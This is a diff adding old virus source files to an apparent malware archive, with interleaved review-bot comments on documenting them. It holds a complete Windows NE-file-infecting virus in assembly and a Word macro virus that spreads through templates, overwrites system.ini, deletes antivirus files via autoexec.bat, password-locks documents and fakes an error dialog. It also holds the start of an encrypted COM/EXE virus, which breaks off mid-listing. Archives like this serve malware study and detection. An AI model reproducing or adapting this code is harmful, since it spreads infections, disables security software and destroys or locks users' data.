b/MSDOS/Virus.MSDOS.Unknown.winvir.asm 
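Review bot: `prefix db 'hell='` and `windir db 'indir='` read like truncated strings but are intentional: `shell_loop` and `dir_loop` match the leading `'s'`/`'w'` with `scasb` and then `repe cmpsb` only the remainder, so a comment on each line (`; leading letter matched by scasb in shell_loop`) would keep a reader from "correcting" them. For the same audience the prose header, long as it is, never records the two markers the code relies on: the residency handshake (`ax=1894h` answered with `cx=1234h` in `int21start`) and the NE-header offset, which `executing` uses as the already-infected test (`cmp word ptr [si+3ch],400h`, moved back by 8 on infection). Both are the first things an analyst will want from a 650-line listing, and the "Possible Bugs and Improvements" section is not where they will look.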
@@ -0,0 +1,688 @@ +;A Basic Windows-EXE infecting virus. Launched as a DOS COM file. + + .model small + + .code + +;All code must be offset-relocatable. +;All data is stored on the stack. + +;Useful constants +NEW_HDR_SIZE EQU 40H ;size of new EXE header + +;The following are used to access data on the stack. The first 512 bytes are +;a buffer for disk reads/writes. +FILE_ID EQU 200H ;"*.EXE" constant +ENTRYPT EQU 206H ;ip of virus start +VIRSTART EQU 208H ;offset of virus start in cs +NH_OFFSET EQU 20AH ;new EXE header offset from file start +VIRSECS EQU 20CH ;size added to file, in sectors for virus +INITSEC EQU 20EH ;initial cs location in file (sectors) +RELOCS EQU 210H ;number of relocatables in initial cs +LOG_SEC EQU 212H ;logical sector size for pgm +CS_SIZE EQU 214H ;size of all data in code seg, including rels, not virus +NEW_HDR EQU 216H ;new EXE header + +;The following gives the size of the virus, in bytes +VIRUS_SIZE EQU OFFSET END_VIRUS - OFFSET VIRUS + + ORG 100H + +;****************************************************************************** +;This is the main virus routine. It simply finds a file to infect and infects +;it, and then passes control to the host program. It resides in the first +;segment of the host program, that is, the segment where control is initially +;passed. 
+ +VIRUS: + push ax ;save all registers + push bx + push cx + push dx + push si + push di + call VIR_START +VIR_START: + pop bx + sub bx,3+6 + push bp ;save segments and bp + push ds + push es + mov ax,ss ;all viral data is in stack segment + mov ds,ax + mov es,ax + sub sp,512+128 ;data area + mov bp,sp ;bp indexes data + mov [bp+VIRSTART],bx ;save virus starting offset here + call FIND_FILE ;find a viable file to infect + jnz GOTO_HOST ;z set if a file was found + call INFECT_FILE ;infect it if found +GOTO_HOST: + add sp,512+128 + pop es + pop ds + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax +VIRUS_DONE: + jmp HOST ;pass control to host program + +;****************************************************************************** +;This routine searches for a file to infect. It looks for EXE files and then +;checks them to see if they're uninfected, infectable Windows files. If a file +;is found, this routine returns with Z set, with the file left open, and its +;handle in the bx register. This FIND_FILE searches only the current directory. + +FIND_FILE: + mov di,bp ;first, put '*.EXE',0 on stack + add di,FILE_ID ;at this location + mov dx,di ;set dx up for search first + mov ax,2E2AH ;*. + stosw + mov ax,5845H ;EX + stosw + mov ax,0045H ;E(0) + stosw + xor cx,cx ;file attribute + mov ah,4EH ;search first + int 21H +FIND_LOOP: + or al,al ;see if search successful + jnz FIND_EXIT ;nope, exit with NZ set + call FILE_OK ;see if it is infectable + jz FIND_EXIT ;yes, get out with Z set + mov ah,4FH ;no, search for next file + int 21H + jmp SHORT FIND_LOOP +FIND_EXIT: ;pass control back to main routine + ret + +;This routine determines whether a file is ok to infect. The conditions for an +;OK file are as follows: +; +; (1) It must be a Windows EXE file. +; (2) There must be enough room in the initial code segment for it. +; (3) The file must not be infected already. 
+; +;If the file is OK, this routine returns with Z set, the file open, and the +;handle in bx. If the file is not OK, this routine returns with NZ set, and +;it closes the file. This routine also sets up a number of important variables +;as it snoops through the file. These are used by the infect routine later. +FILE_OK: + push ds + push es ;save seg registers + mov ah,2FH + int 21H ;get current DTA address in es:bx + push es + push ds + pop es + pop ds ;exchange ds and es + mov dx,bx ;put address in ds:dx + add dx,30 ;set ds:dx to point to file name + mov ah,3DH ;ok, now open the file + mov al,01000010B ;flags, read/write, etc. + int 21H + pop es + pop ds ;restore seg registers + jnc FOK1 ;error on opening? + jmp FOK_ERROR2 ;yes, exit now +FOK1: mov bx,ax ;open ok, put handle in bx + mov ah,3FH ;now read EXE header + mov dx,bp ;ds:dx points to file buffer + mov cx,40H ;read 40H bytes + int 21H + jc FN1 ;exit on error + cmp [bp],5A4DH ;see if first 2 bytes are 'MZ' + jnz FN1 ;nope, file not an EXE, exit + cmp WORD PTR [bp+18H],40H ;see if reloc table is at 40H or more + jc FN1 ;nope, it can't be a Windows EXE + mov dx,[bp+3CH] ;ok, put offset to new header in dx + mov [bp+NH_OFFSET],dx ;and save it here + xor cx,cx + mov ax,4200H ;now do a seek from start + int 21H + jc FN1 + mov ah,3FH + mov cx,NEW_HDR_SIZE ;now read the new header + mov dx,bp ;into memory + add dx,NEW_HDR + int 21H + jc FN1 ;exit if there is an error + cmp [bp+NEW_HDR],454EH ;see if this is 'NE' new header ID + jnz FN1 ;nope, not a Windows EXE! + mov al,[bp+36H+NEW_HDR] ;get target OS flags + and al,2 ;see if target OS = windows + jnz FOK2 ;ok, go on +FN1: jmp FOK_ERROR1 ;else exit + +;If we get here, then condition (1) is fulfilled. 
+ +FOK2: mov dx,[bp+16H+NEW_HDR] ;get initial cs + call GET_SEG_ENTRY ;and read seg table entry into disk buf + jc FOK_ERROR1 + mov ax,[bp+2] ;put segment length in ax + add ax,VIRUS_SIZE ;add size of virus to it + jc FOK_ERROR1 ;if we carry, there's not enough room + ;else we're clear on this count + +;If we get here, then condition (2) is fulfilled. + + mov cx,[bp+NEW_HDR+32H] ;logical sector alignment + mov ax,1 + shl ax,cl ;ax=logical sector size + mov cx,[bp] ;get logical-sector offset of start seg + mul cx ;byte offset in dx:ax + add ax,WORD PTR [bp+NEW_HDR+14H];add in ip of entry point + adc dx,0 + mov cx,dx + mov dx,ax ;put entry point in cx:dx + mov ax,4200H ;and seek from start of file + int 21H + jc FOK_ERROR1 + mov ah,3FH + mov cx,20H ;read 32 bytes + mov dx,bp + int 21H ;into buffer + jc FOK_ERROR1 + mov di,bp + mov si,[bp+VIRSTART] ;get starting offset of virus in cs + mov cx,10H ;compare 32 bytes +FOK3: mov ax,cs:[si] ;of virus at cs + add si,2 + add di,2 + cmp ax,[di-2] ;with code in buffer + loopz FOK3 + jz FOK_ERROR1 ;already there, exit not ok + +;If we get here, then condition (3) is fulfilled, all systems go! + + xor al,al ;set Z flag + ret ;and exit + +FOK_ERROR1: + mov ah,3EH ;close file before exiting + int 21H +FOK_ERROR2: + mov al,1 + or al,al ;set NZ + ret ;and return to caller + +;****************************************************************************** +;This routine modifies the file we found to put the virus in it. There are a +;number of steps in the infection process, as follows: +; 1) We have to modify the segment table. For the initial segment, this +; involves (a) increasing the segment size by the size of the virus, +; and (b) increase the minimum allocation size of the segment, if it +; needs it. Every segment AFTER this initial segment must also be +; adjusted by adding the size increase, in sectors, of the virus +; to it. +; 2) We have to change the starting ip in the new header. 
The virus is +; placed after the host code in this segment, so the new ip will be +; the old segment size. +; 3) We have to move all sectors in the file after the initial code segment +; out by VIRSECS, the size of the virus in sectors. +; 4) We have to move the relocatables, if any, at the end of the code +; segment we are infecting, to make room for the virus code +; 5) We must move the virus code into the code segment we are infecting. +; 6) We must adjust the jump in the virus to go to the original entry point. +; 7) We must adjust the resource offsets in the resource table to reflect +; their new locations. +; 8) We have to kill the fast-load area. +; +INFECT_FILE: + mov dx,[bp+NEW_HDR+24H] ;get resource table @ + add dx,[bp+NH_OFFSET] + xor cx,cx + mov ax,4200H + int 21H + mov dx,bp + add dx,LOG_SEC ;read logical sector size + mov ah,3FH + mov cx,2 + int 21H + mov cx,[bp+LOG_SEC] + mov ax,1 + shl ax,cl + mov [bp+LOG_SEC],ax ;put logical sector size here + + mov ax,[bp+NEW_HDR+14H] ;save old entry point + mov [bp+ENTRYPT],ax ;for future use + + mov dx,[bp+NEW_HDR+16H] ;read seg table entry + call GET_SEG_ENTRY ;for initial cs + + mov ax,[bp] ;get location of this seg in file + mov [bp+INITSEC],ax ;save that here + mov ax,[bp+2] ;get segment size + mov [bp+NEW_HDR+14H],ax ;update entry ip in new header in ram + call SET_RELOCS ;set up RELOCS and CS_SIZE + + mov ax,VIRUS_SIZE ;now calculate added size of segment + add ax,[bp+CS_SIZE] ;ax=total new size + xor dx,dx + mov cx,[bp+LOG_SEC] + div cx ;ax=full sectors in cs with virus + or dx,dx ;any remainder? 
+ jz INF05 + inc ax ;adjust for partially full sector +INF05: push ax + mov ax,[bp+CS_SIZE] ;size without virus + xor dx,dx + div cx + or dx,dx + jz INF07 + inc ax +INF07: pop cx + sub cx,ax ;cx=number of secs needed for virus + mov [bp+VIRSECS],cx ;save this here + + call UPDATE_SEG_TBL ;perform mods in (1) above on file + + mov ax,4200H ;now move file pointer to new header + mov dx,[bp+NH_OFFSET] + xor cx,cx + int 21H + + lea di,[bp+NEW_HDR+37H] ;zero out fast load area + xor ax,ax + stosb + stosw + stosw ;(8) completed + mov ah,40H ;and update new header in file + mov dx,bp ;(we updated the entry point above) + add dx,NEW_HDR + mov cx,NEW_HDR_SIZE + int 21H ;mods in (2) above now complete + + call MOVE_END_OUT ;move end of virus out by VIRSECS (3) + ;also sets up RELOCS count + cmp WORD PTR [bp+RELOCS],0 ;any relocatables in cs? + jz INF1 ;nope, don't need to relocate them + call RELOCATE_RELOCS ;relocate relocatables in cs (4) +INF1: call WRITE_VIRUS_CODE ;put virus into cs (5 & 6) + call UPDATE_RES_TABLE ;update resource table entries + + mov ah,3EH ;close the file now + int 21H ;all done infecting! + +; mov ah,2FH ;report file name infected +; int 21H ;for DOS-based debugging purposes +; push es ;only! +; pop ds +; add bx,30 +; mov dx,bx +;ZLP: mov al,[bx] +; or al,al +; jz ZLP1 +; inc bx +; jmp ZLP +;ZLP1: mov BYTE PTR [bx],'$' +; mov ah,9 +; int 21H + + ret + +;The following procedure updates the Segment Table entries per item (1) in +;INFECT_FILE. +UPDATE_SEG_TBL: + mov dx,[bp+NEW_HDR+16H] ;read seg table entry + call GET_SEG_ENTRY ;for initial cs + mov ax,[bp+2] ;get seg size + add ax,VIRUS_SIZE ;add the size of the virus to seg size + mov [bp+2],ax ;and update size in seg table + + mov ax,[bp+6] ;get min allocation size of segment + or ax,ax ;is it 64K? 
+ jz US2 ;yes, leave it alone +US1: add ax,VIRUS_SIZE ;add virus size on + jnc US2 ;no overflow, go and update + xor ax,ax ;else set size = 64K +US2: mov [bp+6],ax ;update size in table in ram + + mov ax,4201H + mov cx,0FFFFH + mov dx,-8 + int 21H ;back up to location of seg table entry + + mov ah,40H ;and write modified seg table entry + mov dx,bp ;for initial cs to segment table + mov cx,8 + int 21H ;ok, init cs seg table entry is modified + + mov di,[bp+NEW_HDR+1CH] ;get number of segment table entries + +US3: push di ;save table entry counter + mov dx,di ;dx=seg table entry # to read + call GET_SEG_ENTRY ;read it into disk buffer + + mov ax,[bp] ;get offset of this segment in file + cmp ax,[bp+INITSEC] ;higher than initial code segment? + jle US4 ;nope, don't adjust + add ax,[bp+VIRSECS] ;yes, add the size of virus in +US4: mov [bp],ax ;adjust segment loc in memory + + mov ax,4201H + mov cx,0FFFFH + mov dx,-8 + int 21H ;back up to location of seg table entry + + mov ah,40H ;and write modified seg table entry + mov dx,bp + mov cx,8 + int 21H + pop di ;restore table entry counter + dec di + jnz US3 ;and loop until all segments done + + ret ;all done + +;This routine goes to the segment table entry number specified in dx in the +;file and reads it into the disk buffer. dx=1 is the first entry! +GET_SEG_ENTRY: + mov ax,4200H ;seek in file + dec dx + mov cl,3 + shl dx,cl + add dx,[bp+NH_OFFSET] + add dx,[bp+NEW_HDR+22H] ;dx=ofs of seg table entry requested + xor cx,cx ; in the file + int 21H ;go to specified table entry + jc GSE1 ;exit on error + + mov ah,3FH ;read table entry into disk buf + mov dx,bp + mov cx,8 + int 21H +GSE1: ret + +;This routine moves the end of the virus out by VIRSECS. The "end" is +;everything after the initial code segment where the virus will live. +;The variable VIRSECS is assumed to be properly set up before this is called. +;This routine also sets up the RELOCS variable. 
+MOVE_END_OUT: + mov ax,[bp+CS_SIZE] ;size of cs in bytes + mov cx,[bp+LOG_SEC] + xor dx,dx + div cx + or dx,dx + jz ME01 + inc ax +ME01: add ax,[bp+INITSEC] ;ax=next sector after cs + push ax + + xor dx,dx + xor cx,cx + mov ax,4202H ;seek end of file + int 21H ;returns dx:ax = file size + mov cx,[bp+LOG_SEC] + div cx ;ax=sectors in file + mov si,ax ;keep it here + pop di ;last sector after code segment + dec di +MEO2: push si + push di + call MOVE_SECTOR ;move sector number si out + pop di + pop si + dec si + cmp si,di + jnz MEO2 ;and loop until all moved + + ret + +;This routine moves a single sector from SI to SI+VIRSECS +MOVE_SECTOR: + mov ax,si + mov cx,[bp+LOG_SEC] + mul cx + mov cx,dx + mov dx,ax + mov ax,4200H + int 21H ;seek sector si + + mov ah,3FH ;and read it + mov dx,bp + mov cx,[bp+LOG_SEC] + int 21H + + mov ax,[bp+VIRSECS] + dec ax ;calculate new, relative file ptr + mov cx,[bp+LOG_SEC] + mul cx + mov cx,dx + mov dx,ax + mov ax,4201H + int 21H ;and move there + + mov ah,40H + mov dx,bp + mov cx,[bp+LOG_SEC] + int 21H ;and write sector there + + ret + +;This routine simply sets the variable RELOCS and CS_SIZE variables in memory. +SET_RELOCS: + mov WORD PTR [bp+RELOCS],0 + mov dx,[bp+NEW_HDR+16H] ;read init cs seg table entry + call GET_SEG_ENTRY + mov ax,[bp+4] ;get segment flags + xor dx,dx + and ah,1 ;check for relocation data + mov ax,[bp+NEW_HDR+14H] ;size of segment is this + jz SRE ;no data, continue + push ax + push ax ;there is relocation data, how much? 
+ mov ax,[bp+INITSEC] ;find end of code in file + mov cx,[bp+LOG_SEC] + mul cx ;dx:ax = start of cs in file + pop cx ;cx = size of code + add ax,cx + adc dx,0 + mov cx,dx + mov dx,ax ;cx:dx=end of cs in file + mov ax,4200H ;so go seek it + int 21H + mov ah,3FH ;and read 2 byte count of relocatables + mov dx,bp + mov cx,2 + int 21H + mov ax,[bp] + mov [bp+RELOCS],ax ;save count here + mov cl,3 + shl ax,cl + add ax,2 ;size of relocation data + pop cx ;size of code in segment + xor dx,dx + add ax,cx ;total size of segment + adc dx,0 +SRE: mov [bp+CS_SIZE],ax ;save it here + ret + +;This routine relocates the relocatables at the end of the initial code +;segment to make room for the virus. It will move any number of relocation +;records, each of which is 8 bytes long. +RELOCATE_RELOCS: + mov ax,[bp+RELOCS] ;number of relocatables + mov cl,3 + shl ax,cl + add ax,2 ;ax=total number of bytes to move + push ax + + mov ax,[bp+INITSEC] + mov cx,[bp+LOG_SEC] + mul cx ;dx:ax = start of cs in file + add ax,[bp+NEW_HDR+14H] + adc dx,0 ;dx:ax = end of cs in file + pop cx ;cx = size of relocatables + add ax,cx + adc dx,0 ;dx:ax = end of code+relocatables + xchg ax,cx + xchg dx,cx ;ax=size cx:dx=location + +RR_LP: push cx + push dx + push ax + cmp ax,512 + jle RR1 + mov ax,512 ;read up to 512 bytes +RR1: sub dx,ax ;back up file pointer + sbb cx,0 + push cx + push dx + push ax + mov ax,4200H ;seek desired location in file + int 21H + pop cx + mov ah,3FH + mov dx,bp + int 21H ;read needed number of bytes, # in ax + pop dx + pop cx + push ax ;save # of bytes read + add dx,VIRUS_SIZE ;move file pointer up now + adc cx,0 + mov ax,4200H + int 21H + pop cx ;bytes to write + mov ah,40H + mov dx,bp + int 21H ;write them to new location + pop ax + pop dx + pop cx + cmp ax,512 ;less than 512 bytes to write? 
+ jle RRE ;yes, we're all done + sub ax,512 ;nope, adjust indicies + sub dx,512 + sbb cx,0 + jmp RR_LP ;and go do another + +RRE: ret + +;This routine writes the virus code itself into the code segment being infected. +;It also updates the jump which exits the virus so that it points to the old +;entry point in this segment. The only trick is that we can't write directly +;from cs since we can't just set ds=cs in windows or you get a fault. Thus +;we move the virus to the disk buffer and then write from there. +WRITE_VIRUS_CODE: + mov ax,[bp+INITSEC] ;sectors to code segment + mov cx,[bp+LOG_SEC] + mul cx ;dx:ax = location of code seg + add ax,[bp+NEW_HDR+14H] + adc dx,0 ;dx:ax = place to put virus + mov cx,dx + mov dx,ax + push cx + push dx ;save these to adjust jump + mov ax,4200H ;seek there + int 21H + mov si,[bp+VIRSTART] ;si=start of virus + mov cx,VIRUS_SIZE ;cx=size of virus +WVCLP: push cx + cmp cx,512 ;512 bytes maximum allowed per write + jle WVC1 + mov cx,512 +WVC1: push cx + mov di,bp ;now move virus to disk buffer +WCV2: mov al,cs:[si] ;get a byte from cs + inc si + stosb ;and save to disk buffer + loop WCV2 ;repeat until done + pop cx ;now write cx bytes to the file + mov dx,bp + mov ah,40H + int 21H + pop cx ;done writing, + cmp cx,512 ;did we have more than 512 bytes? + jle WVC3 ;nope, all done writing + sub cx,512 ;else subtract 512 + jmp WVCLP ;and do another + +WVC3: pop dx ;ok, now we have to update the jump + pop cx ;to the host + mov ax,OFFSET VIRUS_DONE - OFFSET VIRUS + inc ax + add dx,ax + adc cx,0 ;cx:dx=location to update + push ax + mov ax,4200H ;go there + int 21H + pop ax + inc ax + inc ax + add ax,[bp+NEW_HDR+14H] ;ax=offset of instr after jump + sub ax,[bp+ENTRYPT] ;ax=distance to jump + neg ax ;make it a negative number + mov [bp],ax ;save it here + mov ah,40H ;and write it to disk + mov cx,2 + mov dx,bp + int 21H ;all done + ret + +;Update the resource table so sector pointers are right. 
+UPDATE_RES_TABLE: + mov dx,[bp+NEW_HDR+24H] ;move to resource table in EXE + add dx,[bp+NH_OFFSET] + add dx,2 + xor cx,cx + mov ax,4200H + int 21H +URT1: + mov ah,3FH ;read 8 byte typeinfo record + mov dx,bp + mov cx,8 + int 21H + cmp WORD PTR [bp],0 ;is type ID 0? + jz URTE ;yes, all done + + mov cx,[bp+2] ;get count of nameinfo records to read + +URT2: push cx + mov ah,3FH ;read 1 nameinfo record + mov dx,bp + mov cx,12 + int 21H + + mov ax,[bp] ;get offset of resource + cmp ax,[bp+INITSEC] ;greater than initial cs location? + jle URT3 ;nope, don't worry about it + add ax,[bp+VIRSECS] ;add size of virus + mov [bp],ax + + mov ax,4201H ;now back file pointer up + mov dx,-12 + mov cx,0FFFFH + int 21H + mov ah,40H ;and write updated resource rec to + mov dx,bp ;the file + mov cx,12 + int 21H + +URT3: + pop cx + dec cx ;read until all nameinfo records for + jnz URT2 ;this typeinfo are done + + jmp URT1 ;go get another typeinfo record + + +URTE: ret + +;****************************************************************************** +END_VIRUS: ;label for the end of the windows virus + +;****************************************************************************** +;The following HOST is only here for the DOS-based loader. Once this infects +;a windows file, the virus will jump to the startup code for the program it +;is attached to. +HOST: mov ax,4C00H + int 21H + + END VIRUS + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.wm_demez.txt b/MSDOS/Virus.MSDOS.Unknown.wm_demez.txt new file mode 100644 index 00000000..008186ab --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.wm_demez.txt 
@@ -0,0 +1,285 @@ +Name: Demenz +Author: Serialkiller +Resident: No +Encryption: Yes +Steahlt: Yes + +The virus have 5 macros: +- AutoOpen +- AutoNew +- Demenz +- ToolsMacro +- FileSave + +============================================================================= +============================================================================= +[AutoOpen] + +Sub MAIN +On Error Resume Next +n$ = DefaultDir$(2) + "\NORMAL.DOT" +f$ = FileName$() +If GetAttr(n$) < 32 Then Goto del +a = CountMacros(0) +If a > 0 Then + For b = 1 To a + If MacroName$(b, 0) = "AutoOpen" Then c = 1 + Next b +End If + +If c <> 1 Then +Organizer .Copy, .Source = f$, .Destination = n$, .Name = "AutoOpen", .Tab = 3 +Organizer .Copy, .Source = f$, .Destination = n$, .Name = "AutoNew", .Tab = 3 +Organizer .Copy, .Source = f$, .Destination = n$, .Name = "Demenz", .Tab = 3 +Organizer .Copy, .Source = f$, .Destination = n$, .Name = "FileSave", .Tab = 3 +Organizer .Copy, .Source = f$, .Destination = n$, .Name = "ToolsMacro", .Tab = 3 + +End If + +aa = CountMacros(1) +If aa > 0 Then + For bb = 1 To aa + If MacroName$(bb, 1) = "AutoOpen" Then cc = 1 + Next bb +End If + +If cc <> 1 Then + FileSaveAs .Format = 1 + fm$ = FileName$() + ":AutoOpen" + MacroCopy "AutoOpen", fm$ + fm$ = FileName$() + ":AutoNew" + MacroCopy "AutoNew", fm$ + fm$ = FileName$() + ":Demenz" + MacroCopy "Demenz", fm$ + fm$ = FileName$() + ":FileSave" + MacroCopy "FileSave", fm$ + fm$ = FileName$() + ":ToolsMacro" + MacroCopy "ToolsMacro", fm$ + +End If +End Sub + +============================================================================= + +[AutoNew] + +Sub MAIN +On Error Goto Finish +DisableInput 1 +Call AutoOpen +On Error Resume Next +SetAttr "C:\Windows\system.ini", 0 + Open "C:\Windows\system.ini" For Output As #1 + Print #1, "[*****************************]" + Print #1, "[***The Hackers Manifesto ***]" + Print #1, "[*****************************]" + Print #1, "[]" + Print #1, "[]" + Print #1, "[This is our world now ...]" + 
Print #1, "[the world of the electron and the switch,]" + Print #1, "[the beaty of the baud. We make use of a servive already]" + Print #1, "[existing without paying for what could be dirt-cheap]" + Print #1, "[if it wasnt run by profiteering gluttons, and you]" + Print #1, "[callus criminals. We explore... and YOU call us]" + Print #1, "[criminals. We seek after knowledge... and YOU,]" + Print #1, "[call us criminals. We exist without skin color]" + Print #1, "[without nationality, without religious bias...]" + Print #1, "[and YOU call us criminals.]" + Print #1, "[YOU build atomic bombs, YOU wage wars, YOU murder,]" + Print #1, "[cheat, and let lie to us and try to make us belive its]" + Print #1, "[for OUR OWN GOOD, yet were the criminals.]" + Print #1, "[]" + Print #1, "[]" + Print #1, "[Yes Im a criminal. My crime is that of coriosity.]" + Print #1, "[My crime is that of judging people by what they say]" + Print #1, "[and think, not what they look like. My crime is that]" + Print #1, "[of outsmarting YOU, something that YOU will never]" + Print #1, "[forgive me for.]" + Print #1, "[]" + Print #1, "[]" + Print #1, "[I am a hacker, and this is my manifesto.]" + Print #1, "[YOU may stop this individual, but YOU cant stop us ALL]" + Print #1, "[]" + Print #1, "[]" + Print #1, "[]" + Print #1, "[Serialkiller presents]" + Print #1, "[]" + Print #1, "[THE Demenz virus]" + Print #1, "[Greetings to all membaz aff the Codebreakers]" + Close #1 + +Finish: +End Sub + +============================================================================= + +[FileSave] + +Sub MAIN +FileSave +On Error Resume Next +FileSaveAs .Password = "Concetta" +End Sub + +============================================================================= + +[Demenz] + +Sub MAIN +On Error Resume Next +SE1$ = Files$("C:\PC-Cillin 95\Scan32.dll") +If SE1$ = "" Then Goto AV2 +SetAttr "c:\autoexec.bat", 0 +Open "c:\autoexec.bat" For Append As #1 +Print #1, "@echo off" +Print #1, "attrib -h -r -s +a 
c:\pc-cil~1\*.* >nul" +Print #1, "del c:\pc-cil~1\*.dll >nul" +Close #1 +Kill "C:\PC-Cillin 95\Lpt$vpn.*" + +AV2: +SE2$ = Files$("C:\PC-Cillin 97\Scan32.dll") +If SE2$ = "" Then Goto AV3 +SetAttr "c:\autoexec.bat", 0 +Open "c:\autoexec.bat" For Append As #1 +Print #1, "@echo off" +Print #1, "attrib -h -r -s +a c:\pc-cil~1\*.* >nul" +Print #1, "del c:\pc-cil~1\*.dll >nul" +Close #1 +Kill "C:\PC-Cillin 97\Lpt$vpn.*" + +AV3: +SE3$ = Files$("C:\Tsc\PC-Cillin 97\Scan32.dll") +If SE3$ = "" Then Goto AV4 +SetAttr "c:\autoexec.bat", 0 +Open "c:\autoexec.bat" For Append As #1 +Print #1, "@echo off" +Print #1, "attrib -h -r -s +a c:\tsc\pc-cil~1\*.* >nul" +Print #1, "del c:\tsc\pc-cil~1\*.dll >nul" +Close #1 +Kill "C:\Tsc\PC-Cillin 97\Lpt$vpn.*" + +AV4: +SE4$ = Files$("C:\Zlockav\Gsav.dat") +If SE4$ = "" Then Goto AV5 +Kill SE4$ +Kill "C:\Zlockav\Gsav.cas" + +AV5: +SE5$ = Files$("C:\VB7\Virus.txt") +If SE5$ = "" Then Goto AV6 +Kill SE5$ + +AV6: +SE6$ = Files$("C:\Program Files\Norton AntiVirus\Viruscan.dat") +If SE6$ = "" Then Goto AV7 +Kill SE6$ +Kill "C:\Program Files\Symantec\Symevnt.386" + +AV7: +SE7$ = Files$("C:\Program Files\McAfee\VirusScan95\Scan.dat") +If SE7$ = "" Then Goto AV8 +Kill SE7$ +Kill "C:\Program Files\McAfee\VirusScan95\Mcscan32.dll" + +AV8: +SE8$ = Files$("C:\Program Files\McAfee\VirusScan\Scan.dat") +If SE8$ = "" Then Goto AV9 +Kill SE8$ +Kill "C:\Program Files\McAfee\VirusScan\Mcscan32.dll" + +AV9: +SE9$ = Files$("C:\Program Files\Command Software\F-PROT95\Sign.def") +If SE9$ = "" Then Goto AV10 +Kill SE9$ +Kill "C:\Program Files\Command Software\F-PROT95\Dvp.vxd" + +AV10: +SE10$ = Files$("C:\Program Files\AntiViral Toolkit Pro\Avp32.exe") +If SE10$ = "" Then Goto AV11 +Kill SE10$ +Kill "C:\Program Files\AntiViral Toolkit Pro\*.avc" + +AV11: +SE11$ = Files$("C:\TBAVW95\Tbscan.sig") +If SE11$ = "" Then Goto joke +SetAttr "c:\autoexec.bat", 0 +Open "c:\autoexec.bat" For Append As #1 +Print #1, "@echo off" +Print #1, "attrib -h -r -s +a c:\Tbavw95\*.* 
>nul" +Print #1, "del c:\Tbavw95\Tb*.* >nul" +Close #1 +Kill "C:\Tbavw95\Tbavw95.vxd" + +joke: +SE12$ = Files$("C:\Programme\Norton AntiVirus\*.dat") +If SE12$ = "" Then Goto exit +SetAttr "c:\autoexec.bat", 0 +Open "c:\autoexec.bat" For Append As #1 +Print #1, "@echo off" +Print #1, "attrib -h -r -s +a c:\Programme Norton AntiVirus\*.* >nul" +Print #1, "del c:\Norton AntiVirus\*.* >nul" +Close #1 +Kill "C:\Programme\Norton AntiVirus\*.dat" +Kill "C:\Programme\Symantec\Symevnt.386" +exit: +End Sub + +============================================================================= +[ToolsMacro] + +Sub MAIN + +B$ = "Out of memory." +C$ = "WordBasic Err = 7" +Dim ComboBox1$(0) +ComboBox1$(0) = "" +Dim ListBox1$(0) +ListBox1$(0) = "" +Dim DropListBox2$(0) +DropListBox2$(0) = "Normal.dot(Global Template)" + + +A: +Begin Dialog UserDialog 442, 320, "Macro" + CancelButton 290, 38, 141, 21 + PushButton 290, 14, 141, 21, "Rec&ord...", .D2 + + + PushButton 290, 72, 141, 21, "&Run", .D3 + PushButton 290, 97, 141, 21, "&Cancel", .D4 + PushButton 290, 125, 141, 21, "&Delete", .D5 + PushButton 290, 161, 141, 21, "Or&ganizer...", .D6 + ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1 + + Text 6, 223, 93, 13, "Macros &Available In:", .T1 + Text 7, 259, 109, 13, "Description:", .T2 + Text 7, 7, 93, 13, "&Macro Name:", .T3 + ListBox 7, 276, 425, 38, ListBox1$(), .LB1 + + DropListBox 6, 238, 425, 19, DropListBox2$(), .LB2 + +End Dialog + +Redim dlg As UserDialog + x = Dialog(dlg) +Select Case x + Case 0 + Cancel + Case 1 + MsgBox B$, C$, 48 + Goto A + Case 2 + MsgBox B$, C$, 48 + Goto A + Case 3 + MsgBox B$, C$, 48 + Goto A + Case 4 + MsgBox B$, C$, 48 + Goto A + Case 5 + MsgBox B$, C$, 48 + Goto A + End Select +End Sub diff --git a/MSDOS/Virus.MSDOS.Unknown.wrz_d00d.asm b/MSDOS/Virus.MSDOS.Unknown.wrz_d00d.asm new file mode 100644 index 00000000..38dabcbe --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.wrz_d00d.asm 
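Review bot: The `joke:` branch of the [Demenz] macro emits batch commands whose paths do not agree with the directory it just tested: `attrib -h -r -s +a c:\Programme Norton AntiVirus\*.* >nul` drops the backslash after `Programme`, and `del c:\Norton AntiVirus\*.* >nul` names a different directory than the `Files$("C:\Programme\Norton AntiVirus\*.dat")` check, while — unlike the other branches, which use the 8.3 alias `pc-cil~1` — both are unquoted long names containing a space. For an archived sample this should be recorded rather than repaired, since it implies the German-locale Norton branch of the autoexec.bat payload most likely fails while the two `Kill` calls in that branch still execute; I would add under the header metadata a line such as `Note: the 'joke:' branch writes inconsistent, unquoted autoexec.bat paths and is unlikely to run as intended.` AutoOpen also branches with `If GetAttr(n$) < 32 Then Goto del` but no `del:` label appears anywhere in that macro, which looks like either a transcription gap in the listing or a label error in the original and deserves a similar header note. Finally, the header field `Steahlt: Yes` is presumably `Stealth`, which the ToolsMacro replacement (faking `Out of memory.` on every button) confirms.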
@@ -0,0 +1,681 @@ +; PX.ASM : [WaReZ_d00dZ] by [pAgE] +; Created wik the Phalcon/Skism Mass-Produced Code Generator +; from the configuration file skeleton.cfg + +.model tiny ; Handy directive +.code ; Virus code segment + org 100h ; COM file starting IP +idi = 'FB' +id = 'ZP' ; ID word for EXE infections +entry_point: db 0e9h,0,0 ; jmp decrypt + +decrypt: ; handles encryption and decryption +patch_startencrypt: + mov di,offset startencrypt ; start of decryption + mov cx,(offset heap - offset startencrypt)/2 ; iterations +decrypt_loop: + db 2eh,81h,05h ; add word ptr cs:[di], xxxx +decrypt_value dw 0 ; initialised at zero for null effect + inc di ; calculate new decryption location + inc di + loop decrypt_loop ; decrypt mo' +startencrypt: + call next ; calculate delta offset +next: pop bp ; bp = IP next + sub bp,offset next ; bp = delta offset + + cmp sp,id ; COM or EXE? + je restoreEXE + cmp sp,idi ; COM or EXE? + je restoreOVR + +restoreCOM: + lea si,[bp+save3] + mov di,100h + push di ; For later return + movsb + jmp short restoreEXIT +restoreEXE: + push ds + push es + push cs ; DS = CS + pop ds + push cs ; ES = CS + pop es + lea si,[bp+jmpsave2] + lea di,[bp+jmpsave] + movsw + movsw + movsw +restoreOVR: + push ds + push es + push cs ; DS = CS + pop ds + push cs ; ES = CS + pop es + lea 